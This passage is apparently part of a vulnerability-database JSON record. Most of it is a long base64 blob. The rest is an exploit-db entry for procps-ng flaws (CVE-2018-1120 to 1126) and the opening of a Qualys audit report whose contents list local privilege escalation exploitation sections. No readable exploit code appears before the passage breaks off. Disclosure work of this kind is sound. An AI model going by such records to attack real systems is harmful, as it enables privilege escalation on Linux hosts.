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", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-05-30T18:08:09", "description": "Procps-ng - Multiple Vulnerabilities. CVE-2018-1120,CVE-2018-1121,CVE-2018-1122,CVE-2018-1123,CVE-2018-1124. Local exploit for Linux platform. Tags: Denial o...", "published": "2018-05-30T00:00:00", "type": "exploitdb", "title": "Procps-ng - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-1126", "CVE-2018-1121", "CVE-2018-1124", "CVE-2018-1120", "CVE-2018-1123", "CVE-2018-1122", "CVE-2018-1125"], "modified": "2018-05-30T00:00:00", "id": "EDB-ID:44806", "href": "https://www.exploit-db.com/exploits/44806/", "sourceData": "Qualys Security Advisory\r\n\r\nProcps-ng Audit Report\r\n\r\n\r\n========================================================================\r\nContents\r\n========================================================================\r\n\r\nSummary\r\n1. FUSE-backed /proc/PID/cmdline\r\n2. Unprivileged process hiding\r\n3. Local Privilege Escalation in top (Low Impact)\r\n4. Denial of Service in ps\r\n5. Local Privilege Escalation in libprocps (High Impact)\r\n 5.1. Vulnerability\r\n 5.2. Exploitation\r\n 5.3. Exploitation details\r\n 5.4. Non-PIE exploitation\r\n 5.5. PIE exploitation\r\nAcknowledgments\r\nPatches.tar.gz.b64\r\n\r\n\r\n========================================================================\r\nSummary\r\n========================================================================\r\n\r\nWe performed a complete audit of procps-ng, the \"command line and full\r\nscreen utilities for browsing procfs, a 'pseudo' file system dynamically\r\ngenerated by the [Linux] kernel to provide information about the status\r\nof entries in its process table\" (https://gitlab.com/procps-ng/procps).\r\nprocps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap,\r\nps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w,\r\nwatch, and the necessary libprocps library.\r\n\r\nWe discovered and submitted patches for more than a hundred bugs 